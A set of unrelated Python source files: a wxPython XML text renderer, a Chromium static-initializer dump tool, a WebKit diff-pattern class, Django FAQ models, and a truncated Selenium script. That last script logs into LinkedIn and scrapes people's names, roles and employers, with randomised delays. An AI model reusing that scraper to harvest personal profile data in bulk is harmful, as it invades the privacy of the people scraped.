return '<img src="{0}"{1}>'.format(gram_url,' '.join(' {0}="{1}"'.format(key,val) for (key,val) in attrs.items()))
#----------------------------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register
|
163gal/Time-Line
|
refs/heads/master
|
libs64/wx/lib/fancytext.py
|
6
|
# 12/02/2003 - Jeff Grimmett ([email protected])
#
# o Updated for 2.5 compatibility.
#
"""
FancyText -- methods for rendering XML specified text
This module exports four main methods::
def GetExtent(str, dc=None, enclose=True)
def GetFullExtent(str, dc=None, enclose=True)
def RenderToBitmap(str, background=None, enclose=True)
def RenderToDC(str, dc, x, y, enclose=True)
In all cases, 'str' is an XML string. Note that start and end tags are
only required if *enclose* is set to False. In this case the text
should be wrapped in FancyText tags.
In addition, the module exports one class::
class StaticFancyText(self, window, id, text, background, ...)
This class works similar to StaticText except it interprets its text
as FancyText.
The text can support superscripts and subscripts, text in different
sizes, colors, styles, weights and families. It also supports a
limited set of symbols, currently *times*, *infinity*, *angle* as well
as greek letters in both upper case (*Alpha* *Beta*... *Omega*) and
lower case (*alpha* *beta*... *omega*).
>>> frame = wx.Frame(wx.NULL, -1, "FancyText demo", wx.DefaultPosition)
>>> sft = StaticFancyText(frame, -1, testText, wx.Brush("light grey", wx.SOLID))
>>> frame.SetClientSize(sft.GetSize())
>>> didit = frame.Show()
>>> from guitest import PauseTests; PauseTests()
"""
# Copyright 2001-2003 Timothy Hochberg
# Use as you see fit. No warranties, I cannot be held responsible, etc.
import copy
import math
import sys
import wx
import xml.parsers.expat
__all__ = "GetExtent", "GetFullExtent", "RenderToBitmap", "RenderToDC", "StaticFancyText"
if sys.platform == "win32":
_greekEncoding = str(wx.FONTENCODING_CP1253)
else:
_greekEncoding = str(wx.FONTENCODING_ISO8859_7)
_families = {"fixed" : wx.FIXED, "default" : wx.DEFAULT, "decorative" : wx.DECORATIVE, "roman" : wx.ROMAN,
"script" : wx.SCRIPT, "swiss" : wx.SWISS, "modern" : wx.MODERN}
_styles = {"normal" : wx.NORMAL, "slant" : wx.SLANT, "italic" : wx.ITALIC}
_weights = {"normal" : wx.NORMAL, "light" : wx.LIGHT, "bold" : wx.BOLD}
# The next three classes: Renderer, SizeRenderer and DCRenderer are
# what you will need to override to extend the XML language. All of
# the font stuff as well as the subscript and superscript stuff are in
# Renderer.
_greek_letters = ("alpha", "beta", "gamma", "delta", "epsilon", "zeta",
"eta", "theta", "iota", "kappa", "lambda", "mu", "nu",
"xi", "omnikron", "pi", "rho", "altsigma", "sigma", "tau", "upsilon",
"phi", "chi", "psi", "omega")
def iround(number):
return int(round(number))
def iceil(number):
return int(math.ceil(number))
class Renderer:
"""Class for rendering XML marked up text.
See the module docstring for a description of the markup.
    This class must be subclassed and the methods that do the drawing
    overridden for a particular output device.
"""
defaultSize = None
defaultFamily = wx.DEFAULT
defaultStyle = wx.NORMAL
defaultWeight = wx.NORMAL
defaultEncoding = None
defaultColor = "black"
def __init__(self, dc=None, x=0, y=None):
if dc == None:
dc = wx.MemoryDC()
self.dc = dc
self.offsets = [0]
self.fonts = [{}]
self.width = self.height = 0
self.x = x
self.minY = self.maxY = self._y = y
if Renderer.defaultSize is None:
Renderer.defaultSize = wx.NORMAL_FONT.GetPointSize()
if Renderer.defaultEncoding is None:
Renderer.defaultEncoding = wx.Font_GetDefaultEncoding()
def getY(self):
if self._y is None:
self.minY = self.maxY = self._y = self.dc.GetTextExtent("M")[1]
return self._y
def setY(self, value):
        self._y = value
y = property(getY, setY)
def startElement(self, name, attrs):
method = "start_" + name
if not hasattr(self, method):
raise ValueError("XML tag '%s' not supported" % name)
getattr(self, method)(attrs)
def endElement(self, name):
methname = "end_" + name
if hasattr(self, methname):
getattr(self, methname)()
elif hasattr(self, "start_" + name):
pass
else:
raise ValueError("XML tag '%s' not supported" % methname)
def characterData(self, data):
self.dc.SetFont(self.getCurrentFont())
for i, chunk in enumerate(data.split('\n')):
if i:
self.x = 0
                self.y = self.maxY = self.maxY + self.dc.GetTextExtent("M")[1]
if chunk:
width, height, descent, extl = self.dc.GetFullTextExtent(chunk)
self.renderCharacterData(data, iround(self.x), iround(self.y + self.offsets[-1] - height + descent))
else:
width = height = descent = extl = 0
self.updateDims(width, height, descent, extl)
def updateDims(self, width, height, descent, externalLeading):
self.x += width
self.width = max(self.x, self.width)
self.minY = min(self.minY, self.y+self.offsets[-1]-height+descent)
self.maxY = max(self.maxY, self.y+self.offsets[-1]+descent)
self.height = self.maxY - self.minY
def start_FancyText(self, attrs):
pass
start_wxFancyText = start_FancyText # For backward compatibility
def start_font(self, attrs):
for key, value in attrs.items():
if key == "size":
value = int(value)
elif key == "family":
value = _families[value]
elif key == "style":
value = _styles[value]
elif key == "weight":
value = _weights[value]
elif key == "encoding":
value = int(value)
elif key == "color":
pass
else:
raise ValueError("unknown font attribute '%s'" % key)
attrs[key] = value
font = copy.copy(self.fonts[-1])
font.update(attrs)
self.fonts.append(font)
def end_font(self):
self.fonts.pop()
def start_sub(self, attrs):
if attrs.keys():
raise ValueError("<sub> does not take attributes")
font = self.getCurrentFont()
self.offsets.append(self.offsets[-1] + self.dc.GetFullTextExtent("M", font)[1]*0.5)
self.start_font({"size" : font.GetPointSize() * 0.8})
def end_sub(self):
self.fonts.pop()
self.offsets.pop()
def start_sup(self, attrs):
if attrs.keys():
raise ValueError("<sup> does not take attributes")
font = self.getCurrentFont()
self.offsets.append(self.offsets[-1] - self.dc.GetFullTextExtent("M", font)[1]*0.3)
self.start_font({"size" : font.GetPointSize() * 0.8})
def end_sup(self):
self.fonts.pop()
self.offsets.pop()
def getCurrentFont(self):
font = self.fonts[-1]
return wx.Font(font.get("size", self.defaultSize),
font.get("family", self.defaultFamily),
font.get("style", self.defaultStyle),
font.get("weight",self.defaultWeight),
False, "",
font.get("encoding", self.defaultEncoding))
def getCurrentColor(self):
font = self.fonts[-1]
return wx.TheColourDatabase.FindColour(font.get("color", self.defaultColor))
def getCurrentPen(self):
return wx.Pen(self.getCurrentColor(), 1, wx.SOLID)
def renderCharacterData(self, data, x, y):
raise NotImplementedError()
def _addGreek():
alpha = 0xE1
Alpha = 0xC1
def end(self):
pass
for i, name in enumerate(_greek_letters):
def start(self, attrs, code=chr(alpha+i)):
self.start_font({"encoding" : _greekEncoding})
self.characterData(code)
self.end_font()
setattr(Renderer, "start_%s" % name, start)
setattr(Renderer, "end_%s" % name, end)
if name == "altsigma":
continue # There is no capital for altsigma
def start(self, attrs, code=chr(Alpha+i)):
self.start_font({"encoding" : _greekEncoding})
self.characterData(code)
self.end_font()
setattr(Renderer, "start_%s" % name.capitalize(), start)
setattr(Renderer, "end_%s" % name.capitalize(), end)
_addGreek()
class SizeRenderer(Renderer):
"""Processes text as if rendering it, but just computes the size."""
def __init__(self, dc=None):
Renderer.__init__(self, dc, 0, 0)
def renderCharacterData(self, data, x, y):
pass
def start_angle(self, attrs):
self.characterData("M")
def start_infinity(self, attrs):
width, height = self.dc.GetTextExtent("M")
width = max(width, 10)
height = max(height, width / 2)
self.updateDims(width, height, 0, 0)
def start_times(self, attrs):
self.characterData("M")
def start_in(self, attrs):
self.characterData("M")
class DCRenderer(Renderer):
"""Renders text to a wxPython device context DC."""
def renderCharacterData(self, data, x, y):
self.dc.SetTextForeground(self.getCurrentColor())
self.dc.DrawText(data, x, y)
def start_angle(self, attrs):
self.dc.SetFont(self.getCurrentFont())
self.dc.SetPen(self.getCurrentPen())
width, height, descent, leading = self.dc.GetFullTextExtent("M")
y = self.y + self.offsets[-1]
self.dc.DrawLine(iround(self.x), iround(y), iround( self.x+width), iround(y))
self.dc.DrawLine(iround(self.x), iround(y), iround(self.x+width), iround(y-width))
self.updateDims(width, height, descent, leading)
def start_infinity(self, attrs):
self.dc.SetFont(self.getCurrentFont())
self.dc.SetPen(self.getCurrentPen())
width, height, descent, leading = self.dc.GetFullTextExtent("M")
width = max(width, 10)
height = max(height, width / 2)
self.dc.SetPen(wx.Pen(self.getCurrentColor(), max(1, width/10)))
self.dc.SetBrush(wx.TRANSPARENT_BRUSH)
y = self.y + self.offsets[-1]
r = iround( 0.95 * width / 4)
xc = (2*self.x + width) / 2
yc = iround(y-1.5*r)
self.dc.DrawCircle(xc - r, yc, r)
self.dc.DrawCircle(xc + r, yc, r)
self.updateDims(width, height, 0, 0)
def start_times(self, attrs):
self.dc.SetFont(self.getCurrentFont())
self.dc.SetPen(self.getCurrentPen())
width, height, descent, leading = self.dc.GetFullTextExtent("M")
y = self.y + self.offsets[-1]
width *= 0.8
width = iround(width+.5)
self.dc.SetPen(wx.Pen(self.getCurrentColor(), 1))
self.dc.DrawLine(iround(self.x), iround(y-width), iround(self.x+width-1), iround(y-1))
self.dc.DrawLine(iround(self.x), iround(y-2), iround(self.x+width-1), iround(y-width-1))
self.updateDims(width, height, 0, 0)
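# Extending the markup (an illustrative sketch, not part of the original
# module): a new empty tag such as <dash/> needs a start_ method on both the
# measuring pass and the drawing pass, mirroring start_times above.
#
# class MySizeRenderer(SizeRenderer):
#     def start_dash(self, attrs):
#         self.characterData("-")
#
# class MyDCRenderer(DCRenderer):
#     def start_dash(self, attrs):
#         self.dc.SetFont(self.getCurrentFont())
#         self.dc.SetPen(self.getCurrentPen())
#         width, height, descent, leading = self.dc.GetFullTextExtent("-")
#         y = self.y + self.offsets[-1]
#         self.dc.DrawLine(iround(self.x), iround(y - height / 2),
#                          iround(self.x + width), iround(y - height / 2))
#         self.updateDims(width, height, descent, leading)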
def RenderToRenderer(str, renderer, enclose=True):
try:
if enclose:
str = '<?xml version="1.0"?><FancyText>%s</FancyText>' % str
p = xml.parsers.expat.ParserCreate()
p.returns_unicode = 0
p.StartElementHandler = renderer.startElement
p.EndElementHandler = renderer.endElement
p.CharacterDataHandler = renderer.characterData
p.Parse(str, 1)
except xml.parsers.expat.error, err:
        raise ValueError('error parsing text "%s": %s' % (str, err))
# Public interface
def GetExtent(str, dc=None, enclose=True):
"Return the extent of str"
renderer = SizeRenderer(dc)
RenderToRenderer(str, renderer, enclose)
return iceil(renderer.width), iceil(renderer.height) # XXX round up
def GetFullExtent(str, dc=None, enclose=True):
renderer = SizeRenderer(dc)
RenderToRenderer(str, renderer, enclose)
return iceil(renderer.width), iceil(renderer.height), -iceil(renderer.minY) # XXX round up
def RenderToBitmap(str, background=None, enclose=1):
"Return str rendered on a minumum size bitmap"
dc = wx.MemoryDC()
# Chicken and egg problem, we need a bitmap in the DC in order to
# measure how big the bitmap should be...
dc.SelectObject(wx.EmptyBitmap(1,1))
width, height, dy = GetFullExtent(str, dc, enclose)
bmp = wx.EmptyBitmap(width, height)
dc.SelectObject(bmp)
if background is None:
dc.SetBackground(wx.WHITE_BRUSH)
else:
dc.SetBackground(background)
dc.Clear()
renderer = DCRenderer(dc, y=dy)
dc.BeginDrawing()
RenderToRenderer(str, renderer, enclose)
dc.EndDrawing()
dc.SelectObject(wx.NullBitmap)
if background is None:
img = wx.ImageFromBitmap(bmp)
bg = dc.GetBackground().GetColour()
img.SetMaskColour(bg.Red(), bg.Green(), bg.Blue())
bmp = img.ConvertToBitmap()
return bmp
def RenderToDC(str, dc, x, y, enclose=1):
"Render str onto a wxDC at (x,y)"
width, height, dy = GetFullExtent(str, dc)
renderer = DCRenderer(dc, x, y+dy)
RenderToRenderer(str, renderer, enclose)
class StaticFancyText(wx.StaticBitmap):
def __init__(self, window, id, text, *args, **kargs):
args = list(args)
kargs.setdefault('name', 'staticFancyText')
if 'background' in kargs:
background = kargs.pop('background')
elif args:
background = args.pop(0)
else:
background = wx.Brush(window.GetBackgroundColour(), wx.SOLID)
bmp = RenderToBitmap(text, background)
wx.StaticBitmap.__init__(self, window, id, bmp, *args, **kargs)
# Old names for backward compatibility
getExtent = GetExtent
renderToBitmap = RenderToBitmap
renderToDC = RenderToDC
# Test Driver
def test():
testText = \
"""<font weight="bold" size="16">FancyText</font> -- <font style="italic" size="16">methods for rendering XML specified text</font>
<font family="swiss" size="12">
This module exports four main methods::
<font family="fixed" style="slant">
def GetExtent(str, dc=None, enclose=True)
def GetFullExtent(str, dc=None, enclose=True)
def RenderToBitmap(str, background=None, enclose=True)
def RenderToDC(str, dc, x, y, enclose=True)
</font>
In all cases, 'str' is an XML string. Note that start and end tags
are only required if *enclose* is set to False. In this case the
text should be wrapped in FancyText tags.
In addition, the module exports one class::
<font family="fixed" style="slant">
class StaticFancyText(self, window, id, text, background, ...)
</font>
This class works similar to StaticText except it interprets its text
as FancyText.
The text can support<sup>superscripts</sup> and <sub>subscripts</sub>, text
in different <font size="20">sizes</font>, <font color="blue">colors</font>, <font style="italic">styles</font>, <font weight="bold">weights</font> and
<font family="script">families</font>. It also supports a limited set of symbols,
currently <times/>, <infinity/>, <angle/> as well as greek letters in both
upper case (<Alpha/><Beta/>...<Omega/>) and lower case (<alpha/><beta/>...<omega/>).
We can use doctest/guitest to display this string in all its marked up glory.
<font family="fixed">
>>> frame = wx.Frame(wx.NULL, -1, "FancyText demo", wx.DefaultPosition)
>>> sft = StaticFancyText(frame, -1, __doc__, wx.Brush("light grey", wx.SOLID))
>>> frame.SetClientSize(sft.GetSize())
>>> didit = frame.Show()
>>> from guitest import PauseTests; PauseTests()
</font></font>
The End"""
app = wx.PySimpleApp()
box = wx.BoxSizer(wx.VERTICAL)
frame = wx.Frame(None, -1, "FancyText demo", wx.DefaultPosition)
frame.SetBackgroundColour("light grey")
sft = StaticFancyText(frame, -1, testText)
box.Add(sft, 1, wx.EXPAND)
frame.SetSizer(box)
frame.SetAutoLayout(True)
box.Fit(frame)
box.SetSizeHints(frame)
frame.Show()
app.MainLoop()
if __name__ == "__main__":
test()
|
GeyerA/android_external_chromium_org
|
refs/heads/master
|
tools/linux/dump-static-initializers.py
|
68
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Dump functions called by static intializers in a Linux Release binary.
Usage example:
  tools/linux/dump-static-initializers.py out/Release/chrome
A brief overview of static initialization:
1) the compiler writes out, per object file, a function that contains
   the static initializers for that file.
2) the compiler also writes out a pointer to that function in a special
section.
3) at link time, the linker concatenates the function pointer sections
into a single list of all initializers.
4) at run time, on startup the binary runs all function pointers.
The functions in (1) all have mangled names of the form
_GLOBAL__I_foobar.cc
using objdump, we can disassemble those functions and dump all symbols that
they reference.
"""
import optparse
import re
import subprocess
import sys
# A map of symbol => informative text about it.
NOTES = {
'__cxa_atexit@plt': 'registers a dtor to run at exit',
'std::__ioinit': '#includes <iostream>, use <ostream> instead',
}
# Determine whether this is a git checkout (as opposed to e.g. svn).
IS_GIT_WORKSPACE = (subprocess.Popen(
['git', 'rev-parse'], stderr=subprocess.PIPE).wait() == 0)
class Demangler(object):
"""A wrapper around c++filt to provide a function to demangle symbols."""
def __init__(self):
self.cppfilt = subprocess.Popen(['c++filt'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
def Demangle(self, sym):
"""Given mangled symbol |sym|, return its demangled form."""
self.cppfilt.stdin.write(sym + '\n')
return self.cppfilt.stdout.readline().strip()
# Matches for example: "cert_logger.pb.cc", capturing "cert_logger".
protobuf_filename_re = re.compile(r'(.*)\.pb\.cc$')
def QualifyFilenameAsProto(filename):
"""Attempt to qualify a bare |filename| with a src-relative path, assuming it
is a protoc-generated file. If a single match is found, it is returned.
Otherwise the original filename is returned."""
if not IS_GIT_WORKSPACE:
return filename
match = protobuf_filename_re.match(filename)
if not match:
return filename
  basename = match.group(1)
gitlsfiles = subprocess.Popen(
['git', 'ls-files', '--', '*/%s.proto' % basename],
stdout=subprocess.PIPE)
candidate = filename
for line in gitlsfiles.stdout:
if candidate != filename:
return filename # Multiple hits, can't help.
candidate = line.strip()
return candidate
# Regex matching the substring of a symbol's demangled text representation most
# likely to appear in a source file.
# Example: "v8::internal::Builtins::InitBuiltinFunctionTable()" becomes
# "InitBuiltinFunctionTable", since the first (optional & non-capturing) group
# picks up any ::-qualification and the last fragment picks up a suffix that
# starts with an opener.
symbol_code_name_re = re.compile(r'^(?:[^(<[]*::)?([^:(<[]*).*?$')
def QualifyFilename(filename, symbol):
"""Given a bare filename and a symbol that occurs in it, attempt to qualify
it with a src-relative path. If more than one file matches, return the
original filename."""
if not IS_GIT_WORKSPACE:
return filename
match = symbol_code_name_re.match(symbol)
if not match:
return filename
symbol = match.group(1)
gitgrep = subprocess.Popen(
['git', 'grep', '-l', symbol, '--', '*/%s' % filename],
stdout=subprocess.PIPE)
candidate = filename
for line in gitgrep.stdout:
if candidate != filename: # More than one candidate; return bare filename.
return filename
candidate = line.strip()
return candidate
# Regex matching nm output for the symbols we're interested in.
# See test_ParseNmLine for examples.
nm_re = re.compile(r'(\S+) (\S+) t (?:_ZN12)?_GLOBAL__(?:sub_)?I_(.*)')
def ParseNmLine(line):
"""Given a line of nm output, parse static initializers as a
(file, start, size) tuple."""
match = nm_re.match(line)
if match:
addr, size, filename = match.groups()
return (filename, int(addr, 16), int(size, 16))
def test_ParseNmLine():
"""Verify the nm_re regex matches some sample lines."""
parse = ParseNmLine(
'0000000001919920 0000000000000008 t '
'_ZN12_GLOBAL__I_safe_browsing_service.cc')
assert parse == ('safe_browsing_service.cc', 26319136, 8), parse
parse = ParseNmLine(
'00000000026b9eb0 0000000000000024 t '
'_GLOBAL__sub_I_extension_specifics.pb.cc')
assert parse == ('extension_specifics.pb.cc', 40607408, 36), parse
# Just always run the test; it is fast enough.
test_ParseNmLine()
def ParseNm(binary):
"""Given a binary, yield static initializers as (file, start, size) tuples."""
nm = subprocess.Popen(['nm', '-S', binary], stdout=subprocess.PIPE)
for line in nm.stdout:
parse = ParseNmLine(line)
if parse:
yield parse
# Regex matching objdump output for the symbols we're interested in.
# Example line:
# 12354ab: (disassembly, including <FunctionReference>)
disassembly_re = re.compile(r'^\s+[0-9a-f]+:.*<(\S+)>')
def ExtractSymbolReferences(binary, start, end):
"""Given a span of addresses, returns symbol references from disassembly."""
cmd = ['objdump', binary, '--disassemble',
'--start-address=0x%x' % start, '--stop-address=0x%x' % end]
objdump = subprocess.Popen(cmd, stdout=subprocess.PIPE)
refs = set()
for line in objdump.stdout:
if '__static_initialization_and_destruction' in line:
raise RuntimeError, ('code mentions '
'__static_initialization_and_destruction; '
'did you accidentally run this on a Debug binary?')
match = disassembly_re.search(line)
if match:
(ref,) = match.groups()
if ref.startswith('.LC') or ref.startswith('_DYNAMIC'):
# Ignore these, they are uninformative.
continue
if ref.startswith('_GLOBAL__I_'):
# Probably a relative jump within this function.
continue
refs.add(ref)
return sorted(refs)
def main():
parser = optparse.OptionParser(usage='%prog [option] filename')
parser.add_option('-d', '--diffable', dest='diffable',
action='store_true', default=False,
help='Prints the filename on each line, for more easily '
'diff-able output. (Used by sizes.py)')
opts, args = parser.parse_args()
if len(args) != 1:
parser.error('missing filename argument')
return 1
binary = args[0]
demangler = Demangler()
file_count = 0
initializer_count = 0
files = ParseNm(binary)
if opts.diffable:
files = sorted(files)
for filename, addr, size in files:
file_count += 1
ref_output = []
qualified_filename = QualifyFilenameAsProto(filename)
if size == 2:
# gcc generates a two-byte 'repz retq' initializer when there is a
# ctor even when the ctor is empty. This is fixed in gcc 4.6, but
# Android uses gcc 4.4.
ref_output.append('[empty ctor, but it still has cost on gcc <4.6]')
else:
for ref in ExtractSymbolReferences(binary, addr, addr+size):
initializer_count += 1
ref = demangler.Demangle(ref)
if qualified_filename == filename:
qualified_filename = QualifyFilename(filename, ref)
note = ''
if ref in NOTES:
note = NOTES[ref]
elif ref.endswith('_2eproto()'):
note = 'protocol compiler bug: crbug.com/105626'
if note:
ref_output.append('%s [%s]' % (ref, note))
else:
ref_output.append(ref)
if opts.diffable:
print '\n'.join('# ' + qualified_filename + ' ' + r for r in ref_output)
else:
print '%s (initializer offset 0x%x size 0x%x)' % (qualified_filename,
addr, size)
print ''.join(' %s\n' % r for r in ref_output)
if opts.diffable:
print '#',
print 'Found %d static initializers in %d files.' % (initializer_count,
file_count)
return 0
if '__main__' == __name__:
sys.exit(main())
|
shinate/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/watchlist/changedlinepattern.py
|
134
|
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class ChangedLinePattern:
def __init__(self, compile_regex, index_for_zero_value):
self._regex = compile_regex
self._index_for_zero_value = index_for_zero_value
def match(self, path, diff_file):
for diff_line in diff_file:
if diff_line[self._index_for_zero_value]:
continue
if self._regex.search(diff_line[2]):
return True
return False
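# Illustrative usage sketch (the diff_file shape is an assumption: tuples of
# (deleted_line_number, added_line_number, text), so index 0 is zero for added
# lines and index 1 is zero for deleted lines):
#
#   import re
#   added_line_pattern = ChangedLinePattern(re.compile(r'setNeedsLayout'), 0)
#   diff_file = [(0, 12, 'void Foo::bar() { setNeedsLayout(); }')]
#   added_line_pattern.match('Source/WebCore/foo.cpp', diff_file)  # True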
|
benspaulding/django-faq
|
refs/heads/master
|
faq/models.py
|
1
|
# -*- coding: utf-8 -*-
from django.db import models
from django.conf import settings
from django.contrib.sites.models import Site
from django.template.defaultfilters import slugify
from django.utils.translation import ugettext_lazy as _
from faq.settings import DRAFTED, PUBLISHED, REMOVED, STATUS_CHOICES
# Managers.
def _field_lookups(model, status=None):
"""
Abstraction of field lookups for managers.
Returns a dictionary of field lookups for a queryset. The lookups
will always filter by site. Optionally, if ``status`` is passed to
the function the objects will also be filtered by the given status.
    This function saves us from having to make two different on-site and
published Managers each for `Topic` and `Question`, and having to move
Managers out of the `FAQBase` model and into each of the `Topic`
and `Question` models.
"""
# Import models here to avoid circular import fail.
from faq.models import Topic, Question
field_lookups = {}
if model == Topic:
field_lookups['sites__pk'] = settings.SITE_ID
if model == Question:
field_lookups['topic__sites__pk'] = settings.SITE_ID
if status:
field_lookups['topic__status'] = status
# Both Topic & Question have a status field.
if status:
field_lookups['status'] = status
return field_lookups
class OnSiteManager(models.Manager):
"""Custom manager providing shortcuts for filtering by status."""
def on_site(self):
"""Returns only items related to the current site."""
return self.get_query_set().filter(**_field_lookups(self.model))
def drafted(self):
"""Returns only on-site items with a status of 'drafted'."""
return self.get_query_set().filter(
**_field_lookups(self.model, DRAFTED))
def published(self):
"""Returns only on-site items with a status of 'published'."""
return self.get_query_set().filter(
**_field_lookups(self.model, PUBLISHED))
def removed(self):
"""Returns only on-site items with a status of 'removed'."""
return self.get_query_set().filter(
**_field_lookups(self.model, REMOVED))
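# Illustrative usage (a sketch, not part of this module): the shortcuts simply
# compose the lookups built by _field_lookups, e.g.
#
#   Topic.objects.published()   # on-site topics whose status is PUBLISHED
#   Question.objects.drafted()  # on-site questions whose topic and own status are DRAFTED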
# Models.
class FAQBase(models.Model):
"""A model holding information common to Topics and Questions."""
created = models.DateTimeField(_(u'date created'), auto_now_add=True)
modified = models.DateTimeField(_(u'date modified'), auto_now=True)
status = models.IntegerField(_(u'status'), choices=STATUS_CHOICES,
# TODO: Genericize/fix the help_text.
db_index=True, default=DRAFTED, help_text=_(u'Only objects with \
"published" status will be displayed publicly.'))
objects = OnSiteManager()
class Meta:
abstract = True
get_latest_by = 'modified'
class Topic(FAQBase):
"""A topic that a Question can belong to."""
title = models.CharField(_(u'title'), max_length=255)
slug = models.SlugField(_(u'slug'), unique=True, help_text=_(u'Used in \
the URL for the topic. Must be unique.'))
description = models.TextField(_(u'description'), blank=True,
help_text=_(u'A short description of this topic.'))
sites = models.ManyToManyField(Site, verbose_name=_(u'sites'),
related_name='faq_topics')
class Meta(FAQBase.Meta):
ordering = ('title', 'slug')
verbose_name = _(u'topic')
verbose_name_plural = _(u'topics')
def __unicode__(self):
return self.title
@models.permalink
def get_absolute_url(self):
return ('faq-topic-detail', (), {'slug': self.slug})
class Question(FAQBase):
"""A frequently asked question."""
question = models.CharField(_(u'question'), max_length=255)
slug = models.SlugField(_(u'slug'), unique=True, help_text=_(u'Used in \
the URL for the Question. Must be unique.'))
answer = models.TextField(_(u'answer'))
topic = models.ForeignKey(Topic, verbose_name=_(u'topic'),
related_name='questions')
ordering = models.PositiveSmallIntegerField(_(u'ordering'), blank=True,
db_index=True, help_text=_(u'An integer used to order the question \
amongst others related to the same topic. If not given this \
question will be last in the list.'))
class Meta(FAQBase.Meta):
ordering = ('ordering', 'question', 'slug')
verbose_name = _(u'question')
verbose_name_plural = _(u'questions')
def __unicode__(self):
return self.question
def save(self, *args, **kwargs):
if not self.slug:
            # We populate the slug here because the common case for adding a
            # Question is as an inline to a Topic and InlineModelAdmin does not
# currently support ``prepopulated_fields`` and it's mean to make
# the user supply a slug by hand.
self.slug = slugify(self.question)[:50]
if not self.ordering:
            # When adding a Question to a Topic, it's easy to overlook the
# ordering. We don't want to throw an error if it's left blank,
# so to be nice we'll just put it at the end of the list.
try:
# Find the highest ordering value for all other Questions
# related to the same topic and add 1.
ordering = self.topic.questions.exclude(pk=self.pk).aggregate(
models.Max('ordering'))['ordering__max'] + 1
except TypeError:
# There are no other related Questions, so let's set this
# as no. 1.
ordering = 1
self.ordering = ordering
super(Question, self).save(*args, **kwargs)
@models.permalink
def get_absolute_url(self):
return ('faq-question-detail', (), {'topic_slug': self.topic.slug,
'slug': self.slug})
|
brkrishna/freelance
|
refs/heads/master
|
linkedin/linkedin_soup.py
|
1
|
# -- coding: utf-8 --
#-------------------------------------------------------------------------------
# Name: linkedin
# Purpose: Parse linked in given a list of companies and write users to a csv file
#
# Author: Ramakrishna
#
# Created: 21/Jan/2016
# Copyright: (c) Ramakrishna 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
from selenium import webdriver # - Can leverage Firefox / PhantomJS
from selenium.webdriver.common.keys import Keys #Used to simulate user typing in search box
#from lxml import html # to parse members list from html page
from bs4 import BeautifulSoup #Using BS4 instead of lxml - customer is king :-)
import configparser #To read settings for the program
import time, random, os, re #time - for delay to allow pages to load, random - to generate random wait time,
#os - get Operating system handle, re - regular expressions to read amounts from text
'''
Logging temporarily for debug purposes, can be removed once the script is stable or integrated with other code
'''
import logging
# create logger
logger = logging.getLogger('linkedin_scraper')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('linkedin.log')
fh.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
SECTION ='SETUP'
def main():
d = None
try:
Config = configparser.ConfigParser()
Config.read('settings.ini')
settings = {}
options = Config[SECTION]
for option in options:
try:
settings[option] = Config[SECTION][option]
except:
settings[option] = None
min_wait = int(settings['min_wait'])
max_wait = int(settings['max_wait'])
logger.debug("Finished reading config settings...")
companies = set(open('companies').readlines())
if os.path.isfile('companies_done'):
finished_companies = set(open('companies_done').readlines())
companies -= finished_companies
logger.debug("Filtered companies to be processed...")
d = webdriver.Firefox()
d.get(settings['base_url'])
d.find_element_by_id('login-email').send_keys(settings['user_id'])
d.find_element_by_id('login-password').send_keys(settings['passwd'])
logger.debug("Logged in...")
d.find_element_by_name('submit').click()
time.sleep(random.randint(min_wait,max_wait))
d.find_element_by_id('main-search-box').clear()
for company in companies:
try:
logger.debug("Searching for company - " + company.replace("\n",""))
d.find_element_by_id('main-search-box').clear()
d.find_element_by_id('main-search-box').send_keys(company.replace("\n",""))
d.find_element_by_name('search').click()
time.sleep(random.randint(min_wait,max_wait))
#tree = html.fromstring(d.page_source)
tree = BeautifulSoup(d.page_source, "html.parser") #the default parser
#Loop through for all pages as long as you have records
records = []
counter = 4
while tree != None:
#Loop only for 3 pages, to test
counter -= 1
if counter == 0:
tree = None
continue
#user_details = tree.xpath("//div[@class='bd']")
user_details = tree.find_all('div', {'class':'bd'})
logger.debug("Found - " + str(len(user_details)) + " records...")
for user in user_details:
name = role = org = location = industry = ''
row = {}
try:
#temp = user.xpath("h3//text()")
#name = '"' + temp[:1][0] + '"'
name = user.find('h3').find('a').text
#TODO - Can derive the level of connection with rest of the temp value
except:
continue #We cannot do anything without name, so move on to next record
try:
#temp = user.xpath("div[@class='description']//text()")
temp = user.find('div', {'class':'description'}).text
#role = '"' + temp[:1][0].replace('at', "").strip() + '"'
#org = '"' + temp[1:][0].strip() + '"'
role = '"' + temp[:temp.find("at")].strip() + '"'
